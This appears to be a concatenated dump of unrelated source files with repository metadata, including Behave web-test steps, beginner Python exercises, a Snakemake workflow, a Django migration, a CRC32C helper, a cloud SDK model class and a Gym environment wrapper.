selector = selelector_list[0].format(i + 2)
name_actual = context.driver.get_atribute(selector=selector)
assert name_actual == name_expected
@step("compare actual holidays date_list with expected")
def step_impl(context):
holidays = context.holidays
formating = lambda part: '-'.join(part.split('.')[::-1])
for i in range(len(holidays)):
date_expected = str(holidays[i][1])
selelector_list = eval(selectors['index_page_holidays']['date'])
selector = selelector_list[0].format(i+2)
date_actual = context.driver.get_atribute(selector=selector)
date_actual = formating(date_actual)
assert date_actual == date_expected
"""-----------------------------------SERV and COMP-------------------------------------------------------"""
@step("check sevices field")
def step_impl(context):
service = eval(selectors['index_page_serv&comp']['serv_name'])
result_1 = context.driver.check_el_text('SERV', *service)
service_amount = eval(selectors['index_page_serv&comp']['serv_amount'])
result_2 = context.driver.check_el_text("-100", *service_amount)
assert result_1==result_2==True
# with open('C:\\Users\\wsu\\Desktop\\xxx.txt', 'a') as file:
# file.write(str(result_2) + '\n')
# with open('C:\\Users\\wsu\\Desktop\\xxx.txt', 'a') as file:
# file.write(str(result_1) + '\n')
@step("check compensations field")
def step_impl(context):
compensation = eval(selectors['index_page_serv&comp']['comp_name'])
result_1 = context.driver.check_el_text('COMP', *compensation)
compensation_amount = eval(selectors['index_page_serv&comp']['comp_amount'])
result_2 = context.driver.check_el_text("200", *compensation_amount)
assert result_1 == result_2 == True
@step("check total")
def step_impl(context):
total = eval(selectors['index_page_serv&comp']['total'])
result = context.driver.check_el_text('100', *total)
assert result == True
"""---------------------------------------BOOKS------------------------------------------------"""
@step("make general select of books")
def step_impl(context):
sel = "SELECT b.name, b.author, s.title, s.id FROM books as b JOIN sub_sections as s ON b.sub_section_id=s.id "
db = config['mysql_db']
context.general_select = mysql_select(sel, **db)
@step("get all genres")
def step_impl(context):
genres=set()
for book in context.general_select:
genres.add(book[2])
context.genres = genres
@step("choose category on the Index page")
def step_impl(context):
genre_list = list(context.genres)
context.random_category = random.choice(genre_list)
context.driver.visibility_of_element(*eval(selectors['index_page_books']['marker']))
context.driver.click_with_wait(*eval(selectors['index_page_books']['category']))
context.driver.click_element_in_list(context.random_category, *eval(selectors['index_page_books']['category_item']))
@step("make select with chosen {typo}")
def step_impl(context, typo):
if typo == 'category':
sel = f"SELECT b.name, b.author, s.title, s.id FROM books as b " \
f"JOIN sub_sections as s ON b.sub_section_id=s.id " \
f"WHERE s.title = '{context.random_category}'"
elif typo == 'search_text':
sel = f"SELECT b.name, b.author, s.title, s.id " \
f"FROM books as b JOIN sub_sections as s ON b.sub_section_id=s.id " \
f"WHERE b.name LIKE '%{context.search_text}%' OR b.author LIKE '%{context.search_text}%'"
db = config['mysql_db']
category_select = mysql_select(sel, **db)
context.result=[]
for book in category_select:
context.result.append(str(book[1]+' '+book[0]).upper())
@step("check selected books on the index page")
def step_impl(context):
time.sleep(3)
els = context.driver.get_elements(*eval(selectors['index_page_books']['book']))
for el in els:
el.location_once_scrolled_into_view
if el.text not in context.result:
assert False
assert True
"""--------------------------"""
@step("get some search random phrase")
def step_impl(context):
book_names=set()
for book in context.general_select:
book_names.add(book[0])
book_names.add(book[1])
search_text = random.choice(list(book_names))
context.search_text = search_text[1:-1]
@step("perform search by the random phrase")
def step_impl(context):
context.driver.visibility_of_element(*eval(selectors['index_page_books']['marker']))
context.driver.input_text(context.search_text, *eval(selectors['index_page_books']['search_field']))
context.driver.click_with_wait(*eval(selectors['index_page_books']['search_button']))
"""----------------------------------------------LIKES-------------------------------------------"""
@step("get {typo} number of likes")
def step_impl(context, typo):
amount_like = context.driver.get_atribute(*eval(selectors['index_page_news']['outer_like_amount']))
if typo == 'initial':
context.initial_like = amount_like
elif typo == 'intermediate':
context.intermediate_like = amount_like
@step("click the like button from {locus} page")
def step_impl(context, locus):
if locus == 'index':
selector = eval(selectors['index_page_news']['outer_like_button'])
elif locus == 'news':
selector = eval(selectors['index_page_news']['inner_like_button'])
context.driver.click_with_wait(*selector)
@step("open news")
def step_impl(context):
context.driver.click_with_wait(*eval(selectors['index_page_news']['news_block']))
@step("compare number of likes with {typo} number")
def step_impl(context, typo):
amount_like = context.driver.get_atribute(*eval(selectors['index_page_news']['inner_like_amount']))
if typo == 'initial':
initial_like = amount_like
assert initial_like == context.initial_like
elif typo == 'intermediate':
intermediate_like = amount_like
assert intermediate_like == context.intermediate_like
@step("Exit the news block")
def step_impl(context):
context.driver.click_by_coordinates(0, 0)
"""-------------------------------------------VIEWS---------------------------------------------"""
@step("delete all views")
def step_impl(context):
sel = "DELETE FROM index_postview"
db = config['pg_db']
pgsql_del(sel, **db)
@step("get initial number of views")
def step_impl(context):
context.initial_views = context.driver.get_atribute(*eval(selectors['index_page_news']['outer_view_amount']))
@step("compare number of views with initial number")
def step_impl(context):
amount_view = context.driver.get_atribute(*eval(selectors['index_page_news']['inner_view_amount']))
assert int(amount_view) == int(context.initial_views)+1
"""-------------------------------------------NEWS TEXT----------------------------------------------"""
@step("get news from db")
def step_impl(context):
data_formater = lambda x: '.'.join([part[-2] + part[-1] for part in x.split('-')[::-1]])
sel = "SELECT * FROM index_news"
db = config['pg_db']
news = pgsql_select(sel, **db)
context.news=[]
for row in news:
d = data_formater(str(row[4].date()))
h_m = str(row[4].time())[0:5]
context.news.append(remove_spaces(row[1]+row[2]) + h_m + d)
# with open('C:\\Users\\wsu\\Desktop\\xxx.txt', 'a', encoding='utf-8') as file:
# file.write(str(context.news) + '\n')
@step("take text_news from {typo} page")
def step_impl(context, typo):
time.sleep(3)
if typo == 'index':
prefix = 'outer'
elif typo == 'news':
prefix = 'inner'
text = context.driver.get_atribute(*eval(selectors['index_page_news'][f'{prefix}_text']))
headline = context.driver.get_atribute(*eval(selectors['index_page_news'][f'{prefix}_headline']))
datum = context.driver.get_atribute(*eval(selectors['index_page_news'][f'{prefix}_datetime']))
if typo == 'index':
context.outer_result = remove_spaces(text) + remove_spaces(headline)+remove_spaces(datum)
elif typo == 'news':
context.inner_result = remove_spaces(text) + remove_spaces(headline)+remove_spaces(datum)
@step("compare news from index_page and news_page")
def step_impl(context):
assert context.outer_result == context.inner_result
@step("check that all news are shown on index page")
def step_impl(context):
for i in range(len(context.news)):
time.sleep(2)
headline_selector = selectors['index_page_news']['universal'].format(i+1, 1, '')
text_selector = selectors['index_page_news']['universal'].format(i+1, 2, '')
datum_selector = selectors['index_page_news']['universal'].format(i+1, 3, '/div[3]')
context.driver.show_element(headline_selector)
headline = context.driver.get_atribute(headline_selector)
text = context.driver.get_atribute(text_selector)
datum = context.driver.get_atribute(datum_selector)
result = remove_spaces(headline) + remove_spaces(text)+remove_spaces(datum)
if result in context.news:
context.news.remove(result)
else:
assert False
"""------------------------------NEWS IMAGE----------------------------"""
@step("get news from db(image)")
def step_impl(context):
sel = "SELECT id, title FROM index_news"
db = config['pg_db']
context.news = pgsql_select(sel, **db)
@step("get the id of the news being checked")
def step_impl(context):
headline_selector = selectors['index_page_news']['universal'].format(1, 1, '')
headline = context.driver.get_atribute(headline_selector)
for row in context.news:
if row[1] == headline:
context.id_news = row[0]
break
assert context.id_news
@step("get image from api")
def step_impl(context):
url = context.host+'/api/media/news/'+str(context.id_news)
response = context.admin_session.get(url)
with open('files/image_news_api.png', 'bw') as file:
file.write(response.content)
@step("make screenshot of the news_image")
def step_impl(context):
element = eval(selectors['index_page_news']['news_image'])
context.driver.screenshot_of_element('image_news_msw', *element)
context.driver.click_by_coordinates(0, 0)
@step("compare news_images")
def step_impl(context):
path_1 = "files/image_news_api.png"
path_2 = "files/image_news_msw.png"
assert check_image(path_1, path_2)
"""-------------------------------------------------------------------------------"""
| [
"[email protected]"
] | |
57a53454f6247d419b233ade15faf301089c4935 | c94a678a2b78907d79bfdbde2a0f19f345d5d68c | /code/week03/two_level_menu.py | e03ffd4315bd6fb842bf1a80b7ce673bf4c09a25 | [] | no_license | Heroes-Academy/IntroPython_Winter2017 | 7f26c009e2d2706128f2fc7ad906e95b4c7324c2 | fdf467fa95b3d0708d40711dfcc9c734c9dd1226 | refs/heads/master | 2021-01-13T03:53:20.238013 | 2017-03-12T15:21:38 | 2017-03-12T15:21:38 | 78,315,006 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 587 | py | print("My firt menu")
print("1. Hear a joke")
menu_choice = # get the selection
if # put the condition in here#
print("Do you want a rabbit joke or science joke?")
next_menu_choice = # get the next selection
if next_menu_choice == "rabbit":
print("What do you call a happy rabbit?")
print("A hop-timist!")
elif ### put the condition for science here:
print("What did the receiver say to the radio wave?")
print("Ouch! That megahertz!")
else:
print("I don't have that joke")
else:
print("I don't have that menu option!")
| [
"[email protected]"
] | |
6c3b088984d81299af5aed927b416186025fa04c | eda678c6158431430fa195fd5d51c424293fc724 | /experiments/subvariant_transfer/Snakefile | de29e27ae35c8a0f3a52d11fb6d2e2853a241462 | [] | no_license | ohsu-comp-bio/dryads-research | 8e75ecf812aa3c5139cffacf43116772d6a36376 | c5c4b9e3c5e4ae5820b1dcfa669abf222e85d0db | refs/heads/master | 2023-04-12T20:55:52.147569 | 2021-08-14T21:36:57 | 2021-08-14T21:36:57 | 139,887,441 | 0 | 3 | null | null | null | null | UTF-8 | Python | false | false | 2,196 |
import os
LOCALDIR = os.path.join(os.environ['CODEDIR'],
'HetMan', 'experiments', 'subvariant_transfer')
TMPDIR = os.path.join(os.environ['TEMPDIR'],
'HetMan', 'subvariant_transfer',
"{}__samps-{}".format(config['cohorts'],
config['samp_cutoff']),
config['mut_levels'],
"{}_{}".format(config['classif'], config['ex_mtype']))
OUTDIR = os.path.join(os.environ['DATADIR'], 'HetMan', 'subvariant_transfer',
"{}__samps-{}".format(config['cohorts'],
config['samp_cutoff']))
localrules: target, consolidate
rule target:
input:
expand("{outdir}/out-data__{mut_levels}_{classif}_{ex_mtype}.p",
outdir=OUTDIR, mut_levels=config['mut_levels'],
classif=config['classif'], ex_mtype=config['ex_mtype'])
threads: 1
rule transfer:
output: "{TMPDIR}/output/out_task-{task_id}.p"
threads: 12
shell: """
set +u; source activate HetMan; set -u;
export OMP_NUM_THREADS=1;
sleep $(( ({wildcards.task_id} + 1) * $(shuf -i 1-13 -n 1) ));
python {LOCALDIR}/fit_transfer.py \
{config[classif]} {config[ex_mtype]} \
--use_dir={TMPDIR} --task_count={config[task_count]} \
--task_id={wildcards.task_id}
"""
rule consolidate:
input:
expand("{tmpdir}/output/out_task-{task_id}.p",
tmpdir=TMPDIR, task_id=range(config['task_count']))
output:
expand("{outdir}/out-data__{mut_levels}_{classif}_{ex_mtype}.p",
outdir=OUTDIR, mut_levels=config['mut_levels'],
classif=config['classif'], ex_mtype=config['ex_mtype'])
threads: 1
shell: """
set +u; source activate HetMan; set -u;
python {LOCALDIR}/merge_transfer.py {TMPDIR}
out_tag={config[mut_levels]}_{config[classif]}_{config[ex_mtype]}
cp {TMPDIR}/out-data.p {OUTDIR}/out-data__${{out_tag}}.p
cp {TMPDIR}/setup/cohort-data.p {OUTDIR}/cohort-data__${{out_tag}}.p
"""
| [
"[email protected]"
] | ||
96ee7dbb079ed5aff687ac0b049615f1919675e7 | 3d8838dab84f880a9131994608c146c032eaaa6f | /uevents/views.py | ff56af7d1111b36e4ef3a3c1ec4a29826f35ed93 | [] | no_license | sergiosalonso/uevents | 9f69c0d09a51216b3de67b37d5b2901557a32157 | 94d5adb36488194657c65817dc8ba45b16ce416a | refs/heads/master | 2022-05-07T22:08:10.155075 | 2019-05-07T09:08:48 | 2019-05-07T09:08:48 | 185,363,746 | 0 | 0 | null | 2022-04-22T21:13:03 | 2019-05-07T09:02:57 | Python | UTF-8 | Python | false | false | 253 | py | from django.views.generic import TemplateView
class IndexView(TemplateView):
template_name='index.html'
class LogOutView(TemplateView):
template_name='success_logout.html'
class LogInView(TemplateView):
template_name='success_login.html'
| [
"[email protected]"
] | |
30c0310b3a8e60252424745a39a32a7ea679b905 | 2c9b77d91f1ba7ece443711c8c9c7280732b07fe | /time_trial_gui/lib/racer_driver/echo_trial_job.py | a4672c7d5f55994814ec380c55f7755607ad3925 | [
"MIT"
] | permissive | andresriancho/time_trial | d68c06dfc7fa2fc6c396b6e813d8df23ad068f76 | d7a23dae0bc4e2ecb3eb1ea0f4a94e21861571cc | refs/heads/master | 2021-01-18T02:34:46.045593 | 2015-10-30T16:46:38 | 2015-10-30T16:46:38 | 45,219,305 | 0 | 1 | null | 2015-10-30T00:33:01 | 2015-10-30T00:33:00 | null | UTF-8 | Python | false | false | 524 | py | import subprocess
CPP_ECHO_TIMING_EXECUTABLE = "../racer/bin/run_timing_client"
def run_echo_trial_job(trial):
print("Executing Echo Trial...")
#TODO: get this from a config file
cmd = []
cmd.append(CPP_ECHO_TIMING_EXECUTABLE)
cmd.append(trial.target_host)
cmd.append(str(trial.target_port))
cmd.append(str(int(trial.real_time)))
cmd.append(str(trial.core_affinity))
cmd.append(str(trial.delay))
cmd.append(str(trial.reps))
print(cmd)
return subprocess.check_output(cmd)
| [
"[email protected]"
] | |
9cfc1c903389414320a80047a53517d24b5020bd | 283bbf2ce575ea72010e9823907285b08d20fce4 | /breathecode/authenticate/migrations/0001_initial.py | 401599c5ba55399253edb86f4edba14a5ef0a547 | [] | no_license | AnMora/apiv2 | c084ffcb4ff5b7a0a01dac8fca26f4f4c37aad97 | fa3b3f0ce4a069facdecd18e133c7b4222a0004a | refs/heads/master | 2023-05-19T23:00:34.257230 | 2021-06-08T21:17:56 | 2021-06-08T21:17:56 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,355 | py | # Generated by Django 3.0.7 on 2020-06-16 06:25
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='CredentialsGithub',
fields=[
('github_id', models.IntegerField(primary_key=True, serialize=False)),
('token', models.CharField(max_length=255)),
('email', models.CharField(max_length=150, unique=True)),
('avatar_url', models.CharField(max_length=255)),
('name', models.CharField(max_length=150)),
('blog', models.CharField(max_length=150)),
('bio', models.CharField(max_length=255)),
('company', models.CharField(max_length=150)),
('twitter_username', models.CharField(blank=True, max_length=50, null=True)),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('user', models.OneToOneField(blank=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"[email protected]"
] | |
3c228e9863635cdf5f5389d7f9a128c741ce52bc | c934e7c27f0e72385218a14b4e2a7e94a747a360 | /google-cloud-sdk/lib/googlecloudsdk/command_lib/util/crc32c.py | 42382ea1e774df38f8d3f3912594d1f689df477a | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | PrateekKhatri/gcloud_cli | 5f74b97494df4f61816026af9460b9c4d8e89431 | 849d09dd7863efecbdf4072a504e1554e119f6ae | refs/heads/master | 2023-03-27T05:53:53.796695 | 2021-03-10T04:08:14 | 2021-03-10T04:08:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,121 | py | # -*- coding: utf-8 -*- #
# Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helpers for calculating CRC32C checksums."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import base64
import six
# pylint: disable=g-import-not-at-top
try:
# TODO(b/175725675) Make google_crc32c available with Cloud SDK.
import google_crc32c
IS_GOOGLE_CRC32C_AVAILABLE = True
except ImportError:
import gcloud_crcmod as crcmod
IS_GOOGLE_CRC32C_AVAILABLE = False
print('using crcmod')
# pylint: enable=g-import-not-at-top
def get_crc32c():
"""Returns an instance of Hashlib-like helper for CRC32C operations.
Returns:
The google_crc32c.Checksum instance
if google-crc32c (https://github.com/googleapis/python-crc32c) is
available. If not, returns the predefined.Crc instance from crcmod library.
Usage:
# Get the instance.
crc = get_crc32c()
# Update the instance with data. If your data is available in chunks,
# you can update each chunk so that you don't have to keep everything in
# memory.
for chunk in chunks:
crc.update(data)
# Get the digest.
crc_digest = crc.digest()
"""
if IS_GOOGLE_CRC32C_AVAILABLE:
return google_crc32c.Checksum()
return crcmod.predefined.Crc('crc-32c')
def get_crc32c_checksum(data):
"""Calculates the CRC32C checksum of the provided data.
Args:
data (bytes): The bytes over which the checksum should be calculated.
Returns:
An int representing the CRC32C checksum of the provided bytes.
"""
crc = get_crc32c()
crc.update(six.ensure_binary(data))
return int(crc.hexdigest(), 16)
def get_crc32c_hash(data):
"""Calculates the CRC32C hash for the provided data.
This returns the base64 encoded version of the CRC32C digest, which is handy
for GCS objects which store the CRC32C Hash in this format.
Args:
data (bytes): Bytes over which the hash should be calculated.
Returns:
A string represnting the base64 encoded CRC32C hash.
"""
crc = get_crc32c()
crc.update(six.ensure_binary(data))
return base64.b64encode(crc.digest()).decode('ascii')
def does_crc32c_checksum_match(data, data_crc32c_checksum):
"""Checks if checksum for the data matches the supplied checksum.
Args:
data (bytes): Bytes over which the checksum should be calculated.
data_crc32c_checksum (int): Checksum against which data's checksum will be
compared.
Returns:
True iff both checksums match.
"""
return get_crc32c_checksum(data) == data_crc32c_checksum
| [
"[email protected]"
] | |
eadc5422a39457611dd5e83a0283a5b1f65b9fe1 | f9d564f1aa83eca45872dab7fbaa26dd48210d08 | /huaweicloud-sdk-apig/huaweicloudsdkapig/v2/model/app_code_base_info.py | 306617ad18fd84a8907b99a86bf0874ecf9207a2 | [
"Apache-2.0"
] | permissive | huaweicloud/huaweicloud-sdk-python-v3 | cde6d849ce5b1de05ac5ebfd6153f27803837d84 | f69344c1dadb79067746ddf9bfde4bddc18d5ecf | refs/heads/master | 2023-09-01T19:29:43.013318 | 2023-08-31T08:28:59 | 2023-08-31T08:28:59 | 262,207,814 | 103 | 44 | NOASSERTION | 2023-06-22T14:50:48 | 2020-05-08T02:28:43 | Python | UTF-8 | Python | false | false | 5,356 | py | # coding: utf-8
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class AppCodeBaseInfo:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'app_code': 'str',
'id': 'str',
'app_id': 'str',
'create_time': 'str'
}
attribute_map = {
'app_code': 'app_code',
'id': 'id',
'app_id': 'app_id',
'create_time': 'create_time'
}
def __init__(self, app_code=None, id=None, app_id=None, create_time=None):
"""AppCodeBaseInfo
The model defined in huaweicloud sdk
:param app_code: App Code值 支持英文,+_!@#$%+/=,且只能以英文和+、/开头,64-180个字符。
:type app_code: str
:param id: 编号
:type id: str
:param app_id: 应用编号
:type app_id: str
:param create_time: 创建时间
:type create_time: str
"""
self._app_code = None
self._id = None
self._app_id = None
self._create_time = None
self.discriminator = None
self.app_code = app_code
if id is not None:
self.id = id
if app_id is not None:
self.app_id = app_id
if create_time is not None:
self.create_time = create_time
@property
def app_code(self):
"""Gets the app_code of this AppCodeBaseInfo.
App Code值 支持英文,+_!@#$%+/=,且只能以英文和+、/开头,64-180个字符。
:return: The app_code of this AppCodeBaseInfo.
:rtype: str
"""
return self._app_code
@app_code.setter
def app_code(self, app_code):
"""Sets the app_code of this AppCodeBaseInfo.
App Code值 支持英文,+_!@#$%+/=,且只能以英文和+、/开头,64-180个字符。
:param app_code: The app_code of this AppCodeBaseInfo.
:type app_code: str
"""
self._app_code = app_code
@property
def id(self):
"""Gets the id of this AppCodeBaseInfo.
编号
:return: The id of this AppCodeBaseInfo.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this AppCodeBaseInfo.
编号
:param id: The id of this AppCodeBaseInfo.
:type id: str
"""
self._id = id
@property
def app_id(self):
"""Gets the app_id of this AppCodeBaseInfo.
应用编号
:return: The app_id of this AppCodeBaseInfo.
:rtype: str
"""
return self._app_id
@app_id.setter
def app_id(self, app_id):
"""Sets the app_id of this AppCodeBaseInfo.
应用编号
:param app_id: The app_id of this AppCodeBaseInfo.
:type app_id: str
"""
self._app_id = app_id
@property
def create_time(self):
"""Gets the create_time of this AppCodeBaseInfo.
创建时间
:return: The create_time of this AppCodeBaseInfo.
:rtype: str
"""
return self._create_time
@create_time.setter
def create_time(self, create_time):
"""Sets the create_time of this AppCodeBaseInfo.
创建时间
:param create_time: The create_time of this AppCodeBaseInfo.
:type create_time: str
"""
self._create_time = create_time
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, AppCodeBaseInfo):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
d823a54db8bd861ca7aad7a392278d086fec9ee3 | 002f694e38c4b028e70b393510eaa98eb3b4d20f | /ga3c/EnvironmentHandler.py | 8d60913691d177b0b2c7fa4f25f75fe3f2750de8 | [] | no_license | jmribeiro/HybridGA3C | 993cb4579ba0253b3b10a2160982398a0ca07e09 | 9b452e877c5c6ca0e8482c9ba3d6c3d9df7acec1 | refs/heads/master | 2020-03-08T15:09:47.305742 | 2018-04-19T14:20:23 | 2018-04-19T14:20:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,777 | py | from queue import Queue
import gym
import numpy as np
import scipy.misc as misc
import Config
class EnvironmentHandler:
def __init__(self, render, render_lock):
self.environment = gym.make(Config.ATARI_GAME)
self.action_space = self.environment.action_space.n
self.lookback_memory = Queue(maxsize=Config.STACKED_FRAMES)
self.should_render = render
self.render_lock = render_lock
def reset(self):
self.lookback_memory.queue.clear()
state = self._state(self.environment.reset())
while state is None:
state, _, _ = self.step(0)
return state
def step(self, action):
if self.should_render:
with self.render_lock:
self.environment.render()
observation, reward, done, _ = self.environment.step(action)
next_state = self._state(observation)
return next_state, reward, done
def _state(self, observation):
# Already had full depth, remove the oldest
if self.lookback_memory.full(): self.lookback_memory.get()
# Add the new one
self.lookback_memory.put(self._preprocess(observation))
# Game hasn't stacked enough frames yet
if not self.lookback_memory.full():
return None
else:
# Stack state
state = np.array(self.lookback_memory.queue)
return np.transpose(state, [1, 2, 0])
def _preprocess(self, observation):
grayscale_image = np.dot(observation[..., :3], [0.299, 0.587, 0.114])
resized_image = misc.imresize(grayscale_image, [Config.IMAGE_HEIGHT, Config.IMAGE_WIDTH], 'bilinear')
processed_image = resized_image.astype(np.float32) / 128.0 - 1.0
return processed_image | [
"[email protected]"
] | |
23ff84bfd5f8cbbc3030ea2a7ba5a7f0bb1b580c | 73eb0cd7364a35cbc44b9d51bc7ff63d9646d540 | /Python Cheat sheets/Classname.py | 4aa4f0aed6fc6ac21c461e297e34912fc9a5dbee | [] | no_license | RMJ2/DI_bootcamp | 09ac8f5b9915db641f0f29fd0f556d43907b3b21 | 632338d57fc4c838a4eb201056e6651b865740a2 | refs/heads/main | 2023-03-08T16:16:15.015672 | 2021-02-23T09:04:23 | 2021-02-23T09:04:23 | 329,610,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,037 | py | # Step 1
# Create a new class called Animal.
# It should take 2 parameters, "species" and "habitat"
# (make the class defintion and the init method)
# Step2
# add another parameter to your class, which is the sound that the animal makes.
# write a method called talk, that prints out the animals sound.
# Step3
# create 2 instance of animals, and make each one talk.
class Animal: #class name
def __init__(self, species, habitat, sound): # initialise with parameters.
self.species = species # create definition and the init method.
self.habitat = habitat
self.sound = sound
def talk(self): # method called talk (must add self.)
print(self.sound) # prints the animals sound
''' Step 3 '''
a1 = Animal('lion', 'mountains', 'meow') #instance (Instantiate) 1 - including the parameters
a1.talk() # call the function inside the class.
a2 = Animal('cat', 'house', 'roar')
a2.talk()
#---------------------------------------------------------------------------------------------
# Exercise 2 : Dogs
# Create a class Dog.
# In this class, create a method __init__, that takes two parameters : nameand height. This function instantiates two attributes, which values are the parameters.
# Create a method named bark that prints “ goes woof!”
# Create a method jump that prints the following “ jumps cm high!” where x is the height*2.
# Outside of the class, create an object davids_dog. His dog’s name is “Rex” and his height is 50cm.
# Print the details of his dog by calling the methods.
# Create an object sarahs_dog. Her dog’s name is “Teacup” and his height is 20cm.
# Print the details of her dog by calling the methods.
# Create an if statement outside of the class to check which dog is bigger. Print the name of the bigger dog.
# class Dog:
# def __init__(self, name, height):
# self.name = name
# self.height = height
# def bark(self):
# print('goes woof!')
# def jump(self):
# x = height*2
# print(f'jumps {x}cm high!')
# davids_dog = Dog('Rex', 50)
# print(f'{davids_dog.name} is {davids_dog.height}cm.')
# sarahs_dog = Dog('Teacup', 20)
# print(f'{sarahs_dog.name} is {sarahs_dog.height}cm.')
# list_of_dogs = [davids_dog, sarahs_dog]
# tallest_for_now = 0
# tallest_dog = None
# for dog in list_of_dogs:
# if dog.height > tallest_for_now:
# tallest_dog = dog
# tallest_for_now = dog.height
# print(f' The tallest dog is {tallest_dog.name}')
#---------------------------------------------------------------------------------------------
# Bank Account
class Bank():
def __init__(self, account, pin): #initialise parameters
self.account = account
self.pin = pin
self.balance = 0 # value for starting balance
self.history = [] # empty list to store history of deposits and withdrawels.
def deposit(self, amount):
if amount <= 0: # to ensure no negative deposit can be made
print('You must deposit a positive amount')
else:
self.balance += amount # new balance, made by amount deposited
self.history.append(f'Deposit: {amount}') # update list of history for amount deposited.
def withdraw(self, amount):
if amount > self.balance: #to ensure no withdrawal of negative funds is made
print('You do not have enough funds')
else:
self.balance -= amount # new balance, made by amount withdrawn
self.history.append(f'Withdraw: {amount}') # update history listfor amount withdrawn
return amount # returns amount in terminal
def show_balance(self):
print(self.balance) # print balance
def show_history(self): #
for thing in self.history: # item in list (instead of printing on one line)
print(thing) # prints item line by line
b1 = Bank(12345, 54321)
b1.deposit(100)
b1.deposit(100)
b1.withdraw(30)
#---------------------------------------------------------------------------------------------
# Calculator
class Calc:
def add(x,y):
answer = x + y
print(answer)
def sub(x,y):
answer = x - y
print(answer)
def mult(x,y):
answer = x * y
print(answer)
def div(x,y):
answer = x / y
print(answer)
print(Calc.add(5,5))
print(Calc.sub(5,5))
print(Calc.mult(5,5))
print(Calc.div(5,5)) | [
"[email protected]"
] | |
5d8c946b3c08384e5b38e1628c8a3c8731002b8e | b049a961f100444dde14599bab06a0a4224d869b | /sdk/python/pulumi_azure_native/alertsmanagement/v20210401/__init__.py | b63d1d0b1d3561f095248d826033a4565d0bb685 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | pulumi/pulumi-azure-native | b390c88beef8381f9a71ab2bed5571e0dd848e65 | 4c499abe17ec6696ce28477dde1157372896364e | refs/heads/master | 2023-08-30T08:19:41.564780 | 2023-08-28T19:29:04 | 2023-08-28T19:29:04 | 172,386,632 | 107 | 29 | Apache-2.0 | 2023-09-14T13:17:00 | 2019-02-24T20:30:21 | Python | UTF-8 | Python | false | false | 389 | py | # coding=utf-8
# *** WARNING: this file was generated by pulumi. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
from ... import _utilities
import typing
# Export this package's modules as members:
from ._enums import *
from .get_smart_detector_alert_rule import *
from .smart_detector_alert_rule import *
from ._inputs import *
from . import outputs
| [
"[email protected]"
] | |
9ebfefbdb3f40d1c7ba46b70b96d8d45174cab84 | 1a964c7860f9d95c31ca4b8fd4d36a74da1cbf2f | /ParsingWebsite/venv/bin/pip3.7 | b012e092643cb6604adcbaf8463d46f14d877e20 | [] | no_license | azatnt/ParsingKolesa | 8aebb2159ef6d2458604b4530809ca55c0fd5b33 | c20cea97acb3a25f9ac6632de7afea38df59332f | refs/heads/main | 2023-02-20T09:13:16.431579 | 2021-01-25T09:31:59 | 2021-01-25T09:31:59 | 332,691,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 265 | 7 | #!/Users/sulpak/PycharmProjects/ParsingWebsite/venv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal.cli.main import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"[email protected]"
] | |
01d218f4d47a23dac5ba88de6147b92fbf6542a9 | e073d58c135e4b27b861946a6e84aa5b2e0ae7f2 | /datastructure/trie_tree/FindWords.py | 0a243c9f396bfd1364a4582bc2eff965ce8faf41 | [] | no_license | yinhuax/leet_code | c4bdb69752d441af0a3bcc0745e1133423f60a7b | 9acba92695c06406f12f997a720bfe1deb9464a8 | refs/heads/master | 2023-07-25T02:44:59.476954 | 2021-09-04T09:07:06 | 2021-09-04T09:07:06 | 386,097,065 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,529 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : Mike
# @Contact : [email protected]
# @Time : 2021/2/12 16:42
# @File : FindWords.py
from typing import List
"""
